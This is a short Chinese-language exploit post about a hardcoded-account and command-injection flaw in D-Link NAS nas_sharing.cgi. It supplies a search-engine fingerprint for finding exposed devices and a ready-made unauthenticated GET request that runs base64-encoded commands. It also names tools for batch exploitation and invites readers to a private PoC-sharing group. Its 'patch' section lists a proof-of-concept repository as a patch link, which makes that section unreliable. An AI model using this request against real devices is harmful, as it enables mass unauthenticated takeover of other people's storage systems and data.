0x01 產品簡介

D-Link 網絡存儲 (NAS)是中國友訊（D-link）公司的一款統一服務路由器。

0x02 漏洞概述

D-Link NAS nas_sharing.cgi接口存在命令執行漏洞，該漏洞存在于“/cgi-bin/nas_sharing.cgi”腳本中，影響其 HTTP GET 請求處理程序組件。漏洞成因是通過硬編碼帳戶（用戶名：“messagebus”和空密碼）造成的后門以及通過“system”參數的命令注入問題。未經身份驗證的攻擊者可利用此漏洞獲取服務器權限。

0x03 搜索引擎

"Text:In order to access the ShareCenter, please make sure you are using a recent browser(IE 7+, Firefox 3+, Safari 4+, Chrome 3+, Opera 10+)"

0x04 漏洞復現

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=base64編碼的命令 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Accept-Encoding: identity
Accept: */*
Connection: keep-alive

0x05 工具批量

nuclei

afrog

xray

POC腳本獲取

請使用VX掃一掃加入內部POC腳本分享圈子

0x06 修復建議

目前廠商已發布升級補丁以修復漏洞，補丁獲取鏈接：
https://buaq.net/go-232770.html
https://github.com/adhikara13/CVE-2024-3273
https://www.trustwave.com/en-us/resources/security-resources/security-advisories